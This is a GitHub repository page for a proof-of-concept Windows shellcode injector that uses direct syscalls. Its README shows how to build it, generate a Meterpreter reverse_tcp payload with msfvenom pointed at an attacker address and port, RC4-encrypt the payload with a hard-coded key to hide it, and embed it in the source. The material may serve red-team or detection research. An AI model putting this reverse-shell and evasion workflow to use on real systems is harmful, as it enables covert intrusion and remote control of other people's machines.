Skip to content

bats3c/DefensiveInjector

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
Makefile
Makefile
 
 
README.md
README.md
 
 
main.c
main.c
 
 
main.h
main.h
 
 
syscalls.asm
syscalls.asm
 
 

Repository files navigation

Defensive Injector

The code for the shellcode injector from my blog post.

This code is a PoC and will probly only run of windows 10 x64 version 1909, this is because of the syscall numbers changing between versions. To fix, change the syscall number of line 16 in syscalls.asm with the corresponding number for that windows version. They can be found here.

Install & Build

git clone https://github.com/bats3c/DefensiveInjector
cd DefensiveInjector
make

Using different shellcode

  • Generate your shellcode either with msfvenom or something else

    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.239 LPORT=4444 -f raw -o meter.bin

  • Encrypt the shellcode

    Keeping in mind that if you change it here you will need to update the key on line 132 in main.c cat meter.bin | openssl enc -rc4 -nosalt -k "HideMyShellzPlz?" > encmeter.bin

  • Format the shellcode

    Run xxd -i encmeter.bin then replace everything between line 10-60 with the output

Dependencies

sudo apt install mingw-w64 nasm

About

Shellcode injector using direct syscalls

Resources

Readme
Activity

Stars

117 stars

Watchers

4 watching

Forks

35 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages